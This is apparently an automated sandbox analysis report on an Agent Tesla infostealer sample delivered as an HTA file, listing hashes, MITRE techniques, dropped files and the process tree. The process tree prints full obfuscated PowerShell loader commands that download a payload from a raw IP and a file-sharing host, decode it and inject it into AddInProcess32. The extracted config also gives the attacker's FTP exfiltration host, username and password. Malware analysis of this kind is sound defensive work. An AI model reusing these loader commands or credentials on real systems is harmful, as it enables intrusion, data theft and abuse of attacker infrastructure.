agenttesla | fa54825b8b94917037cc1620eb21421f9bd31ac394f396c1fe80546e4ed88dfa

Analysis

max time kernel
93s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-11-2024 07:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

seethebestthingswithgreatsituationshandletotheprogress.hta
Size

178KB
MD5

01928c833c9940a6896666a9d93b9670
SHA1

abe22dd055a6fa39c615cf72818e474f2525e7ae
SHA256

fa54825b8b94917037cc1620eb21421f9bd31ac394f396c1fe80546e4ed88dfa
SHA512

e34bc23996ab1ec12117e463f8b8ec5b4e880635d435286d3e4d09c8499c044dd2f92d8c2927e1435287691ae14dc1e1f7331c2aeae103ca9ac56022b9d883e0
SSDEEP

48:4vahW5oZz7eWLB2CCz7lRo7dmz7lOwo7dO81bBPW1zKfD299Ddaq6bWyxf9DZRDf:4vCl17nuYMiFeAqfoqyWyflRJm0cfQ

Score

10^/10

agenttesla defense_evasion discovery execution keylogger spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.elquijotebanquetes.com
Port:
21
Username:
[email protected]
Password:
4r@d15PS!-!h

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Agenttesla family
agenttesla
Blocklisted process makes network request 3 IoCs

Processes:

POWeRSHElL.EXepowershell.exe

flow pid process

14 3404 POWeRSHElL.EXe
20 1292 powershell.exe
33 1292 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

4948 powershell.exe
1292 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

POWeRSHElL.EXepowershell.exe

pid process

3404 POWeRSHElL.EXe
2624 powershell.exe

flow	pid	process
14	3404	POWeRSHElL.EXe
20	1292	powershell.exe
33	1292	powershell.exe

pid	process
4948	powershell.exe
1292	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

39 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1292 set thread context of 4024 1292 powershell.exe AddInProcess32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
39	ip-api.com

description	pid	process	target process
PID 1292 set thread context of 4024	1292	powershell.exe	AddInProcess32.exe

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

WScript.exepowershell.exepowershell.exeAddInProcess32.exemshta.exepowershell.execsc.execvtres.exePOWeRSHElL.EXe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWeRSHElL.EXe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

POWeRSHElL.EXepowershell.exepowershell.exepowershell.exeAddInProcess32.exe

pid	process
3404	POWeRSHElL.EXe
3404	POWeRSHElL.EXe
2624	powershell.exe
2624	powershell.exe
4948	powershell.exe
4948	powershell.exe
1292	powershell.exe
1292	powershell.exe
4024	AddInProcess32.exe
4024	AddInProcess32.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

POWeRSHElL.EXepowershell.exepowershell.exepowershell.exeAddInProcess32.exe

description	pid	process
Token: SeDebugPrivilege	3404	POWeRSHElL.EXe
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	1292	powershell.exe
Token: SeDebugPrivilege	4024	AddInProcess32.exe

Suspicious use of WriteProcessMemory 29 IoCs

Processes:

mshta.exePOWeRSHElL.EXecsc.exeWScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2904 wrote to memory of 3404	2904	mshta.exe	POWeRSHElL.EXe
PID 2904 wrote to memory of 3404	2904	mshta.exe	POWeRSHElL.EXe
PID 2904 wrote to memory of 3404	2904	mshta.exe	POWeRSHElL.EXe
PID 3404 wrote to memory of 2624	3404	POWeRSHElL.EXe	powershell.exe
PID 3404 wrote to memory of 2624	3404	POWeRSHElL.EXe	powershell.exe
PID 3404 wrote to memory of 2624	3404	POWeRSHElL.EXe	powershell.exe
PID 3404 wrote to memory of 3444	3404	POWeRSHElL.EXe	csc.exe
PID 3404 wrote to memory of 3444	3404	POWeRSHElL.EXe	csc.exe
PID 3404 wrote to memory of 3444	3404	POWeRSHElL.EXe	csc.exe
PID 3444 wrote to memory of 1832	3444	csc.exe	cvtres.exe
PID 3444 wrote to memory of 1832	3444	csc.exe	cvtres.exe
PID 3444 wrote to memory of 1832	3444	csc.exe	cvtres.exe
PID 3404 wrote to memory of 4140	3404	POWeRSHElL.EXe	WScript.exe
PID 3404 wrote to memory of 4140	3404	POWeRSHElL.EXe	WScript.exe
PID 3404 wrote to memory of 4140	3404	POWeRSHElL.EXe	WScript.exe
PID 4140 wrote to memory of 4948	4140	WScript.exe	powershell.exe
PID 4140 wrote to memory of 4948	4140	WScript.exe	powershell.exe
PID 4140 wrote to memory of 4948	4140	WScript.exe	powershell.exe
PID 4948 wrote to memory of 1292	4948	powershell.exe	powershell.exe
PID 4948 wrote to memory of 1292	4948	powershell.exe	powershell.exe
PID 4948 wrote to memory of 1292	4948	powershell.exe	powershell.exe
PID 1292 wrote to memory of 4024	1292	powershell.exe	AddInProcess32.exe
PID 1292 wrote to memory of 4024	1292	powershell.exe	AddInProcess32.exe
PID 1292 wrote to memory of 4024	1292	powershell.exe	AddInProcess32.exe
PID 1292 wrote to memory of 4024	1292	powershell.exe	AddInProcess32.exe
PID 1292 wrote to memory of 4024	1292	powershell.exe	AddInProcess32.exe
PID 1292 wrote to memory of 4024	1292	powershell.exe	AddInProcess32.exe
PID 1292 wrote to memory of 4024	1292	powershell.exe	AddInProcess32.exe
PID 1292 wrote to memory of 4024	1292	powershell.exe	AddInProcess32.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatsituationshandletotheprogress.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2904
- C:\Windows\SysWOW64\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe
  "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3404
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2624
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e1sitijm\e1sitijm.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3444
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCAE1.tmp" "c:\Users\Admin\AppData\Local\Temp\e1sitijm\CSCD3C98691DE8F4DEDBB772BD1E71B1650.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1832
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4140
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4948
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)| .((Get-VARIabLE '*mdr*').Name[3,11,2]-JoiN'')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1292
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POWeRSHElL.EXe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
0ddb9857f42888fbf049a120a1ce6bdb

SHA1
62a857cf911f269417464d0a7f62d1d8c0b82f45

SHA256
655ab4923363d76b815e98a21079789cf0daabcf4adaa5b1e6add18ddef6e34a

SHA512
96ac4ab0332ef53c572dd56bdd14fed078683a07537b0ce72942c800088f81bc5c0c88731cedc4b5a447117d588680476edf8fb54ab315bad915c2620c8592cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
19a525dcd282b56106ba7997288e71b3

SHA1
b7d8fc09a2f9b4351434b37b8b1701914052e403

SHA256
b39485d2470ba6fd2f8a30a234007c75b8e5ab4188336e850e29d433ff867819

SHA512
04f7ef9dbb62ed193941a167b59df687a4ae4894de60eba3221033639966f164165085673ac54c0864a94bc7764114c6c730a9a1754bad261edc435ea3208100

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCAE1.tmp

Filesize
1KB

MD5
f6bdd47bd059ddee00b31893b00a8686

SHA1
53e48d3f508624a718ec1bf823f97773fda1b3a7

SHA256
d88ab58a0ab3e2bf8409f8696401e01ef7e353cf115360578aa22fc845228ce8

SHA512
caf5153b2911f7f95d783f10c56a417d1320a84d711b66ab229f5769470d11837479e7edbbaeabdc374523755a36ed06dbbca4719f5dade7c69b61dc65e622c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uhriopaj.g01.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\e1sitijm\e1sitijm.dll

Filesize
3KB

MD5
99d709bc922cfc09e71db60666126034

SHA1
d19de13cde3f44327035fe9ea4cbd02274bc96d5

SHA256
44ea4324b8a1755ee8657c04289147f3cb7f0e9aecc256f4700ab96334e74fff

SHA512
f43c96cf8432480d80ca1b263e1c50c313f5b6e401c9a71f4d4c708d275ada2c15b152c6ac98a1b33881f5b93d99cc7eb11b5115470c271124086871c3bfa600

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS

Filesize
138KB

MD5
2a43f3918d91622e9ccac7889f3e6dc2

SHA1
7d6131261e7f6a54291bd9e02eb7c985e093cfa7

SHA256
95f59c4235c1d4516b7d5de5a768f0f00c4a64c73a5be26fb26496ac5f378e9b

SHA512
422b39acb1dcacc05938ee122fa614a9a429e28a6a7f7ecf8a7f8416823b0e7ada11c28b7fe52ae1352d85fc99423ffdb16fd85ec2ac27f25a2f3adfed7b638c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e1sitijm\CSCD3C98691DE8F4DEDBB772BD1E71B1650.TMP

Filesize
652B

MD5
1cc87d5329f9bdbf86f750f6af1f4772

SHA1
b84e3119aaf05799ac6e11babd6bbf31e249402d

SHA256
a8c83e5c6abd1a57d2dab2949a6e7a8e5c195fc0439fddc6332353d67e4e100f

SHA512
405320c4d68d4b536c4bbe3a6db4ce892fb0e786441eaea26eb9d8cee1d62771b50a3f44b0d7159ee1a28d3e69b31a5d4a32d1fabed3c197f06127f0e7dd83d1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e1sitijm\e1sitijm.0.cs

Filesize
485B

MD5
d24098e842acdc16d68eb9fc1eb0d97d

SHA1
a5ed59b81d7a78e4f619850c0d05f05984c282a7

SHA256
5a2115bb93abacd6e4cf9c0fc15f629c527fc13513305ffae22ba8872db0e309

SHA512
9a387056470cd7b1cadc638ca29227303a6c447eb551d219fbf0fb0e4c4265d9b9d40e3830088bb8eae3626ceb827de0ccb827c68b5d6a878ac1d1d17056d9ae

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e1sitijm\e1sitijm.cmdline

Filesize
369B

MD5
77f98f5ab3b9a215daa3fdbc8e69e1fb

SHA1
b4668d449f8210d51cc9c8cc7398c91cec159044

SHA256
ded56b08918d03c983768f3359124275a43fb5bf386eafdd99d8de7f1c31690a

SHA512
2b9fbc9aedc6ce0d5a918642f9dfcf22911ab0f638f4a75d538acec9a42ead2a9d345dbf7e6e379746df25db6824e24d27c88800aeaf9824a6cb11e01226186c

Download Submit
memory/1292-102-0x0000000007860000-0x00000000078FC000-memory.dmp

Filesize
624KB

Download
memory/1292-101-0x0000000007700000-0x0000000007858000-memory.dmp

Filesize
1.3MB

Download
memory/2624-29-0x0000000006C40000-0x0000000006C72000-memory.dmp

Filesize
200KB

Download
memory/2624-30-0x000000006D990000-0x000000006D9DC000-memory.dmp

Filesize
304KB

Download
memory/2624-40-0x0000000006030000-0x000000000604E000-memory.dmp

Filesize
120KB

Download
memory/2624-41-0x0000000006C80000-0x0000000006D23000-memory.dmp

Filesize
652KB

Download
memory/2624-42-0x00000000073E0000-0x0000000007A5A000-memory.dmp

Filesize
6.5MB

Download
memory/2624-43-0x0000000006D90000-0x0000000006DAA000-memory.dmp

Filesize
104KB

Download
memory/2624-44-0x0000000006E00000-0x0000000006E0A000-memory.dmp

Filesize
40KB

Download
memory/2624-45-0x0000000007020000-0x00000000070B6000-memory.dmp

Filesize
600KB

Download
memory/2624-46-0x0000000006F90000-0x0000000006FA1000-memory.dmp

Filesize
68KB

Download
memory/2624-47-0x0000000006FC0000-0x0000000006FCE000-memory.dmp

Filesize
56KB

Download
memory/2624-48-0x0000000006FD0000-0x0000000006FE4000-memory.dmp

Filesize
80KB

Download
memory/2624-49-0x00000000070E0000-0x00000000070FA000-memory.dmp

Filesize
104KB

Download
memory/2624-50-0x0000000007010000-0x0000000007018000-memory.dmp

Filesize
32KB

Download
memory/3404-19-0x0000000006490000-0x00000000064DC000-memory.dmp

Filesize
304KB

Download
memory/3404-4-0x00000000710D0000-0x0000000071880000-memory.dmp

Filesize
7.7MB

Download
memory/3404-18-0x0000000006460000-0x000000000647E000-memory.dmp

Filesize
120KB

Download
memory/3404-17-0x0000000005E70000-0x00000000061C4000-memory.dmp

Filesize
3.3MB

Download
memory/3404-6-0x0000000005D90000-0x0000000005DF6000-memory.dmp

Filesize
408KB

Download
memory/3404-65-0x0000000006A20000-0x0000000006A28000-memory.dmp

Filesize
32KB

Download
memory/3404-71-0x00000000710DE000-0x00000000710DF000-memory.dmp

Filesize
4KB

Download
memory/3404-72-0x00000000710D0000-0x0000000071880000-memory.dmp

Filesize
7.7MB

Download
memory/3404-73-0x00000000710D0000-0x0000000071880000-memory.dmp

Filesize
7.7MB

Download
memory/3404-7-0x0000000005E00000-0x0000000005E66000-memory.dmp

Filesize
408KB

Download
memory/3404-5-0x00000000054B0000-0x00000000054D2000-memory.dmp

Filesize
136KB

Download
memory/3404-0-0x00000000710DE000-0x00000000710DF000-memory.dmp

Filesize
4KB

Download
memory/3404-79-0x00000000710D0000-0x0000000071880000-memory.dmp

Filesize
7.7MB

Download
memory/3404-1-0x0000000002B60000-0x0000000002B96000-memory.dmp

Filesize
216KB

Download
memory/3404-3-0x00000000055F0000-0x0000000005C18000-memory.dmp

Filesize
6.2MB

Download
memory/3404-2-0x00000000710D0000-0x0000000071880000-memory.dmp

Filesize
7.7MB

Download
memory/4024-103-0x0000000000400000-0x0000000000442000-memory.dmp

Filesize
264KB

Download
memory/4024-105-0x0000000005660000-0x0000000005C04000-memory.dmp

Filesize
5.6MB

Download
memory/4024-108-0x00000000063D0000-0x0000000006420000-memory.dmp

Filesize
